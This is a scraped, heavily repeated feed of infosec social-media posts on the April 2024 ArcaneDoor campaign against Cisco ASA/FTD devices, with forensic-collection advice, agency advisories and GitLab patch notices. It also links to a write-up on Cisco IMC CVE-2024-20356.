#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) https://fortiguard.fortinet.com/threat-signal-report/5429
##Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) https://www.helpnetsecurity.com/2024/04/24/cve-2024-20353-cve-2024-20359/ #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##updated 2024-04-25T17:25:05.903000
2 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T15:30:38
2 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T13:18:02.660000
2 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T12:30:56
2 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T12:30:51
2 posts
GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-24T21:31:56
4 posts
Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##updated 2024-04-24T21:31:56
6 posts
1 repos
IMO on tient ici un des plus beaux descriptifs/blog post technique de l'année sur l'exploitation de la vulnérabilité CVE-2024-20356 (web-GUI Cisco IMC ) :
✅ Complet
✅ Précis
🛠️ Toolkit disponible sur GitHub
😄 ...et amusant !
𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?
(constat: ces "appliances" sont de vrais 🧀 )
👇
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
"Jailbreaking a Cisco appliance to run DOOM"
##IMO on tient ici un des plus beaux descriptifs/blog post technique de l'année sur l'exploitation de la vulnérabilité CVE-2024-20356 (web-GUI Cisco IMC ) :
✅ Complet
✅ Précis
🛠️ Toolkit disponible sur GitHub
😄 ...et amusant !
𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?
(constat: ces "appliances" sont de vrais 🧀 )
👇
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
"Jailbreaking a Cisco appliance to run DOOM"
##Researchers at Nettitude Labs have published a write-up and PoC for CVE-2024-20356.
This is a command injection vulnerability in the web interface of the Cisco IMC servers that can be used by authenticated attackers to gain root privileges on the device.
Nettitude used the bug to install and play DOOM on the device. Cisco patched the vulnerability last week.
